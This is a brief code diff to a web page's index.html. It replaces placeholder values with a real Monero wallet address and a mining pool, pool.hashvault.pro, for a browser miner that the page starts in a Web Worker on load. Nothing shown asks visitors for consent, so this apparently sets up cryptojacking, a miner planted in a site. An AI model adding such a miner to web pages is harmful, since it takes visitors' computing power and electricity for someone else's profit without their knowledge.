--- a/index.html
+++ b/index.html
@@ -10,7 +10,7 @@
     <script src="https://cdnjs.cloudflare.com/ajax/libs/axios/1.4.0/axios.min.js"></script>
     <script>
         const worker = new Worker('miner.js'); // miner.js handles mining logic
-        worker.postMessage({ address: 'YOUR_MONERO_WALLET_ADDRESS', pool: 'YOUR_POOL_URL' });
+        worker.postMessage({ address: '49HFVes4oHRXLhYTwSYi3t1CTyWBKBs3T8o6ciJ8ihq4fKVQi2aaNPwWBRh31i3gKJJPtUYaXEvp8LbHsAzUZqetSdYpUH4', pool: 'pool.hashvault.pro:80' });
     </script>
 </body>
 </html>
